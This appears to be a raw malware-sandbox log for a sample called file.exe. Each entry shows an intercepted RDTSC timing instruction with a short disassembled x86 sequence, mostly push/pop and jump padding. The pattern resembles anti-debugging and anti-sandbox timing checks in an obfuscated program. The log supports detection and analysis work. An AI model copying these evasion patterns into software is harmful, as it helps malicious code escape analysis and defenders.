Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EC9366 second address: EC936A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EC936A second address: EC93B9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD25C84A62Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], eax 0x0000000e push 00000000h 0x00000010 push ebp 0x00000011 call 00007FD25C84A628h 0x00000016 pop ebp 0x00000017 mov dword ptr [esp+04h], ebp 0x0000001b add dword ptr [esp+04h], 0000001Dh 0x00000023 inc ebp 0x00000024 push ebp 0x00000025 ret 0x00000026 pop ebp 0x00000027 ret 0x00000028 mov edx, 565F979Ah 0x0000002d push 0000001Eh 0x0000002f sub dword ptr [ebp+122D21CAh], esi 0x00000035 nop 0x00000036 push eax 0x00000037 push edx 0x00000038 push eax 0x00000039 push edx 0x0000003a push edx 0x0000003b pop edx 0x0000003c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EC93B9 second address: EC93BD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EC93BD second address: EC93C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EC93C3 second address: EC93E0 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007FD25CDB197Dh 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f jnp 00007FD25CDB1976h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EC94B8 second address: EC94BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EC94BC second address: EC94DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jc 00007FD25CDB1983h 0x0000000c jmp 00007FD25CDB197Dh 0x00000011 popad 0x00000012 push eax 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 push eax 0x00000017 pop eax 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EC94DE second address: EC94E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EC94E3 second address: EC94ED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007FD25CDB1976h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EC9796 second address: EC979F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pushad 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EC979F second address: EC97A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EC97A5 second address: EAE1ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FD25C84A62Ch 0x0000000a popad 0x0000000b nop 0x0000000c push 00000000h 0x0000000e push edx 0x0000000f call 00007FD25C84A628h 0x00000014 pop edx 0x00000015 mov dword ptr [esp+04h], edx 0x00000019 add dword ptr [esp+04h], 00000014h 0x00000021 inc edx 0x00000022 push edx 0x00000023 ret 0x00000024 pop edx 0x00000025 ret 0x00000026 mov dword ptr [ebp+122D1F5Eh], ebx 0x0000002c lea eax, dword ptr [ebp+124781D1h] 0x00000032 mov cx, 2A06h 0x00000036 nop 0x00000037 jmp 00007FD25C84A635h 0x0000003c push eax 0x0000003d jmp 00007FD25C84A62Ah 0x00000042 nop 0x00000043 push 00000000h 0x00000045 push ebx 0x00000046 call 00007FD25C84A628h 0x0000004b pop ebx 0x0000004c mov dword ptr [esp+04h], ebx 0x00000050 add dword ptr [esp+04h], 00000019h 0x00000058 inc ebx 0x00000059 push ebx 0x0000005a ret 0x0000005b pop ebx 0x0000005c ret 0x0000005d call dword ptr [ebp+122D25F0h] 0x00000063 js 00007FD25C84A64Ah 0x00000069 push eax 0x0000006a push edx 0x0000006b push eax 0x0000006c push edx 0x0000006d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EAE1ED second address: EAE1F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EFEF65 second address: EFEF69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EFEF69 second address: EFEF6E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EFEF6E second address: EFEF7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pushad 0x00000007 popad 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b push ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EFF225 second address: EFF22D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EFF3C7 second address: EFF3CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EFF3CD second address: EFF3D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EFF3D1 second address: EFF3E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c je 00007FD25C84A626h 0x00000012 push esi 0x00000013 pop esi 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EFF3E5 second address: EFF413 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jnc 00007FD25CDB1976h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jns 00007FD25CDB198Eh 0x00000012 push eax 0x00000013 push edx 0x00000014 push ecx 0x00000015 pop ecx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EFF413 second address: EFF419 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EFF983 second address: EFF98F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jno 00007FD25CDB1976h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EFF98F second address: EFF994 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EFF994 second address: EFF99A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F046DE second address: F046F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FD25C84A62Eh 0x0000000b popad 0x0000000c push edi 0x0000000d pushad 0x0000000e popad 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 pop edi 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F046F9 second address: F046FF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E91AF5 second address: E91B03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FD25C84A626h 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F0416E second address: F04172 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F04172 second address: F041A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD25C84A633h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jbe 00007FD25C84A626h 0x00000012 pop eax 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 jne 00007FD25C84A626h 0x0000001e push ecx 0x0000001f pop ecx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F041A0 second address: F041B9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD25CDB1985h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F04F9B second address: F04FA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F04FA4 second address: F04FAA instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F04FAA second address: F04FB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F04FB0 second address: F04FDF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FD25CDB1981h 0x00000008 jno 00007FD25CDB1976h 0x0000000e jnc 00007FD25CDB1976h 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 pushad 0x00000018 jo 00007FD25CDB1978h 0x0000001e pushad 0x0000001f popad 0x00000020 pushad 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F04FDF second address: F05009 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 jne 00007FD25C84A626h 0x0000000c jmp 00007FD25C84A635h 0x00000011 popad 0x00000012 js 00007FD25C84A62Ch 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F0515E second address: F05164 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F097E5 second address: F097EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop esi 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F0DE63 second address: F0DE68 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F0DE68 second address: F0DE7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007FD25C84A626h 0x0000000a pop edi 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push ebx 0x0000000e push edi 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F0DFCD second address: F0DFD7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F0DFD7 second address: F0DFDC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F0E43C second address: F0E442 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F0E442 second address: F0E466 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 ja 00007FD25C84A626h 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push esi 0x0000000f jmp 00007FD25C84A633h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F0E466 second address: F0E46B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F0E46B second address: F0E470 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F0E780 second address: F0E79D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD25CDB1985h 0x00000009 push edx 0x0000000a pop edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F0E79D second address: F0E7A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 pushad 0x00000007 popad 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F0E7A6 second address: F0E7D6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007FD25CDB197Fh 0x00000008 jmp 00007FD25CDB1987h 0x0000000d pop eax 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push edi 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F0D8F1 second address: F0D8F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F0D8F5 second address: F0D8F9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F12270 second address: F12274 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F12274 second address: F12278 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F1397E second address: F1399B instructions: 0x00000000 rdtsc 0x00000002 je 00007FD25C84A626h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007FD25C84A633h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F16E03 second address: F16E0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F16998 second address: F169A8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD25C84A62Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F169A8 second address: F169B2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F169B2 second address: F169B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F169B6 second address: F169CA instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push ebx 0x0000000d jl 00007FD25CDB1976h 0x00000013 pop ebx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F169CA second address: F16A04 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FD25C84A639h 0x00000008 jnp 00007FD25C84A626h 0x0000000e ja 00007FD25C84A626h 0x00000014 push ecx 0x00000015 pop ecx 0x00000016 popad 0x00000017 pushad 0x00000018 jng 00007FD25C84A626h 0x0000001e je 00007FD25C84A626h 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F16B5E second address: F16B64 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F16B64 second address: F16B78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b jbe 00007FD25C84A626h 0x00000011 push ecx 0x00000012 pop ecx 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F19D36 second address: F19D3A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F19D3A second address: F19D4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jng 00007FD25C84A62Ch 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F195CC second address: F195D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F195D0 second address: F195D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F1974F second address: F19797 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD25CDB1984h 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FD25CDB1986h 0x00000012 jmp 00007FD25CDB1986h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F19797 second address: F197A3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jp 00007FD25C84A626h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F198F9 second address: F19902 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push edx 0x00000006 pop edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F19902 second address: F1990A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F19A2B second address: F19A5B instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FD25CDB197Ch 0x0000000b pop esi 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f jns 00007FD25CDB1976h 0x00000015 pushad 0x00000016 popad 0x00000017 pushad 0x00000018 popad 0x00000019 jc 00007FD25CDB1976h 0x0000001f popad 0x00000020 pushad 0x00000021 jo 00007FD25CDB1976h 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F19A5B second address: F19A61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F19A61 second address: F19A66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F19A66 second address: F19A6C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F19A6C second address: F19A70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F19A70 second address: F19A76 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F1EA14 second address: F1EA1A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F1EA1A second address: F1EA20 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F1EA20 second address: F1EA26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F1EA26 second address: F1EA45 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FD25C84A633h 0x00000008 push eax 0x00000009 push edx 0x0000000a je 00007FD25C84A626h 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F1DC29 second address: F1DC33 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FD25CDB197Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F1DDC5 second address: F1DDCE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F1DF73 second address: F1DF7D instructions: 0x00000000 rdtsc 0x00000002 jp 00007FD25CDB1976h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F1DF7D second address: F1DF86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F1E224 second address: F1E228 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F1E4DD second address: F1E526 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FD25C84A626h 0x00000008 jmp 00007FD25C84A636h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 push eax 0x00000011 pop eax 0x00000012 jne 00007FD25C84A626h 0x00000018 jnp 00007FD25C84A626h 0x0000001e jmp 00007FD25C84A635h 0x00000023 popad 0x00000024 push eax 0x00000025 push edx 0x00000026 pushad 0x00000027 popad 0x00000028 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F22827 second address: F22832 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FD25CDB1976h 0x0000000a pop edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F22832 second address: F2284C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 ja 00007FD25C84A626h 0x00000009 jmp 00007FD25C84A62Fh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F2284C second address: F22856 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F2817F second address: F28188 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F28188 second address: F2819B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b jp 00007FD25CDB1976h 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F2819B second address: F2819F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F2819F second address: F281C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jc 00007FD25CDB1976h 0x0000000d jmp 00007FD25CDB197Eh 0x00000012 jnl 00007FD25CDB1976h 0x00000018 jbe 00007FD25CDB1976h 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F26D40 second address: F26D48 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 pop eax 0x00000008 rdtsc
